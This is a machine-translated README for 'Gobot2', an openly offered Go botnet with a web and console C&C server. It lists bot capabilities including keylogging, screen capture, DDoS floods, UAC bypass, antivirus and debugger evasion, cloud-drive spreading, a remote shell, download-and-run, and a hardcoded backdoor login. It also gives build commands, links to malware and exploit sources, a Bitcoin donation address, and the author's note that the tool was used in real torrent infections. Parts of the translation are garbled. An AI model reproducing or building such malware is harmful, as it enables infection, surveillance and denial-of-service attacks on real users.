新项目:https://github.com/saturnsvoid/project-whis
Gobot2
看到另一个用户基于僵尸网络之后,我想在枪手机构上做更多的工作,但是我最终构建了一些东西。这有问题,但它更像是一个高级POC。...我不是一个好的编码器,但我能够在网上购买一些基本阅读。我想处理这个项目,但我停了下来,我摆脱了恶意软件和病毒的制作……我将继续进行更多的合法性事情。尽管我将在我的github上发布一些旧项目,而大多数女巫都是恶意的,但我还是把它们放到这里,以使“好人”与他们战斗和亲戚更简单。
C&C功能:
- 写的
- 跨平台
- SQL数据库以获取信息
- 安全登录系统
- 硬编码的登录系统
- 易于使用HTML&CSS C&C
- 基于控制台的C&C
- 紧密的安全性(没有php!)
- 编码和混淆数据
- https或http
- 单,选定的所有命令发行
- 用户代理检测
- 更多的
机器人功能
- 安全错误处理
- 有无限的面板
- 编码和混淆
- 使用https或http
- 旧(> 24小时)命令处理(不要运行旧命令!)
- 运行PowerShell脚本(通过URL,接受的参数)
- 高级Torrent Seeder(Utorrent,Bittorrent Auto下载客户端并在需要时隐藏)
- 驱动器播放器(带有名称列表)
- Dropbox播放器(带有名称列表)
- Google Drive播放器(带有名称列表)
- OneDrive吊具(带有名称列表)
- 高级钥匙记录员(处理所有键,窗口标题,剪贴板,autostart, +更多)
- 系统信息(IP,WiFi,用户,AV,IPCONFIG,CPU,GPU,SYSINFO,已安装软件,.NET框架,复习)
- 屏幕捕获(压缩,定时捕获, +更多)
- 下载并运行(MD5 Hash检查,URL或BASE64,参数,UAC旁路,区域删除剂)
- DDOS方法(螺纹 /W间隔,HTTPGET,TCPFLOOD,UDPFLOOD,SLECLORIS,HULK,TLSFLOOD,带宽排水,Goldeneye,Ace)
- 机器人更新(MD5哈希检查,管理员,区域去除剂)
- UPNP(打开TCP/UDP端口)
- Web-Server(自动UPNP端口80,添加/编辑无限页面)
- 将程序添加到Windows防火墙
- 主机文件编辑器(备份和还原,更换运行,DNS Flusher)
- 远程CMD
- 检测管理权
- 机器人ID生成(永远不会相同)
- 高级防病毒旁路(随机内存分配,Func Hop,延迟,运行时负载DLLS /W OBF,随机连接时间, +更多)
- 先进的反叮当(ISDEBUGGERPRESENT,PROC检测,IP组织检测,文件名检测,反应系统)
- 单个实例系统
- 反向HTTP代理(Conf。Port,后端服务器)
- 主动防御(主动注册表防御,主动文件防御,主动看门狗 +更多)不想被杀死。
- UAC旁路(工作所有版本和当前版本的Windows 10 Pro 64bit)
- 高级安装系统(动态注册表键,动态文件名,保留管理权,广告系列定位(仅在允许国家 /地区安装),区域去除剂,将自我添加到防火墙中)
- 卸载系统(删除所有跟踪)
- 脚本(批次,HTML,VBS,PS)
- 运行shellCode(threadexecute)
- 电源选项(关闭,重新启动,登录)
- 启动错误消息
- 消息框(返回回复)
- 开放网站(可见/隐藏)
- 更改首页
- 更改背景(URL或Base64)
- 运行.EXE(UAC旁路最佳)
- 杀死自我
- 检查Proc是否正在运行
- 隐藏过程 /W活动模式
- 禁用/启用(taskmanger,rededit,命令提示)
- 文件滴管(放置在PC上,没有来自 /w dir选择的迹线)
有关C&C的一些信息
C&C是一个程序,您可以为Windows,Linux,Mac Systems进行编译。它是一个自动运行的网络服务器,可在设置中处理所选端口上的所有连接。如果允许,它将将HTLM C&C提供给连接器,并将有关帐户,机器人和命令作为SQL数据库和bots文件(屏幕截图,键盘名单,ect)保存为bots自己的“配置文件”下的文件”。
您可以从程序(更安全)中控制僵尸网络,也可以从HTML C&C控制它。 C&C的程序非常稳定,基于GO的服务器可以立即处理数百万或请求时,只需确保您的连接良好即可。
C&C在硬编码的登录名(有点像后门)中具有一个构建,如果您“忘记”帐户登录,则可以使用。 C&C可以有任意数量的帐户。
由于它是一个独立的程序,因此消除了SQLI对C&C的攻击问题,因此更安全。
如果正确配置,C&C也可以在TOR隐藏服务中运行,并且客户端(Bot)可以使用洋葱。TO或洋葱。cab expherner(如果需要)。机器人也可以通过袜子代理使用TOR ...易于执行,Google IT。
如何构建和使用
机器人设置位于“变量”服务器设置中,位于“ server.go”中
使用正确的设置编译Gobot.go,制作MySQL数据库并导入DB文件,编译Server.go使用正确的设置
- Go build -o gobot.exe -ldflags“ -h windowsgui”“ c: gobot2 gobot.go”
- Go build build -0 server.exe“ c: gobot2 console server server.go”
始终使用'-w -s'ldflags编译,以从二进制中剥离任何调试信息。
包括工具
- 项目的工具(obfuscator(char+1)和其他废话。
- downloader.go(Golang下载并运行示例)
- downloaderwithuac.go(golang下载并运行UAC旁路示例)
混淆器
它并不是真正的混淆器,它将Char +1移至a = b,c = d,ect。简单,但它会减慢想要弄乱该程序的人以及搜索关键字的程序...
使用的软件包
- github.com/nebulylabs/go-upnp
- golang.org/x/sys/windows/Registry
- github.com/allendang/w32
- github.com/atotto/clipboard
- github.com/stackexchange/wmi
图像
- http://prnt.sc/d67nh5
- http://prnt.sc/d67ogh
- http://prnt.sc/d67oqh
- http://prnt.sc/d6esj3
学分和东西
- https://github.com/decred/gominer
- https://github.com/robvanmieghem/gominer
- https://astaxie.gitbooks.io/build-web-application-with-golang/content/content/en/04.5.html
- http://www.adlice.com/runpe-hide-code-behind-legit-process/
- http://www.hacking-tutorial.com/tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/
- https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
- https://mholt.github.io/json-to-go/
- https://sentinelone.com/blogs/anti-vm-tricks/
- http://hackforums.net/showthread.php?tid=5383448
- https://github.com/grafov/hulk
- https://github.com/nhooyr/dos
- https://github.com/marcelki/socksress
- https://github.com/ammario/ssynflood
- https://github.com/matishsiao/goinfo/blob/master/goinfo_windows.go
- https://github.com/iamacarpet/go-win64api
- https://github.com/Oneumyvakin/initme/blob/master/windows.go
- https://github.com/lolsquad/ddos-scripts
- https://github.com/vbooter/ddos-scripts
- https://github.com/natefinch/pie
- https://www.windows-commandline.com/enable-remote-desktop-command-line/
- https://www.socketloop.com/tutorials/golang-secure-tls-connection-betnection-server-server-and-client
- https://github.com/lextoumbourou/goodhosts
- https://github.com/yinandyangsecurityawareness/dreamr-botnet
- https://github.com/mauri870/ransomware
- http://www.devdungeon.com/content/making-tor-http-requests-go
- http://www.darul.io/post/2015-07-22_go-lang-simple-redverse-proxy
- https://github.com/mauri870/powershell-reverse-http
- https://github.com/gh0std4ncer/lizkebab/blob/master/client.c
- https://github.com/egebalci/egesploit
- https://github.com/egebalci/hercules
- https://github.com/andrewaeva/gobotnet
- https://github.com/saturnsvoid/gobot
- https://github.com/petercunha/goat
- https://github.com/huin/goupnp
- https://github.com/ytisf/thezoo/tree/master/malwares/source/original
- https://github.com/malwares/remote-access-trojan
- https://github.com/kardianos/service
- https://github.com/vova616/screenshot/blob/master/screenshot_windows.go
- http://hackforums.net/showthread.php?tid=5040543
- http://www.calhoun.io/5-iseful-ways-ways-to-use-closures-in-go/
- https://blogs.technet.microsoft.com/ilikesql_by_dandyman/2013/03/03/10/how-to-to-install-a-msi-file-unattendy/
- https://github.com/tadzik/simpleaes
- https://guitmz.com/win32-liora-b/
- https://github.com/rk/go-cron
- https://breakingmalware.com/vulnerabilities/elastic-boundaries-elevating-privileges-by-envorirnment-variables-variables-expansion/
- https://breakingmalware.com/malware/ardbot-a-malware-under-construction/
- https://breakingmalware.com/malware/furtim-malware-avoids-mass-infection/
- https://www.pugetsystems.com/labs/support-software/how-to-disable-sleep-mode-mode-orhibnation-793/
- https://files.sans.org/summit/digital_forensics_and_incident_response_summit_2015/pdfs/theressomethesomethesomethesomatemthemethemthemethemtheboutwmidevonkerr.pdf
- https://github.com/jasonlvhit/gocron
其他
GO是一种了不起且强大的编程语言。如果您还没有,请检查一下; https://golang.org/
捐赠
请捐赠给比特币地址: 1aebr1utjayu3sgtbkzcljmrr5rs7bp7ee
消息
我刚刚读了一篇有关流放计算机,https://www.bleepingcomputer.com/news/security/backdoore-torrents-infect-movie-movie-tv-fans-with-gobot2-malware//似乎有人发现这个项目的用途的文章。我与这个小组或个人没有参与。关于这件事,我无话可说。
-Crab Crab
----------更新日志--------------------------------------------------------
03/15/2017:Intial上传...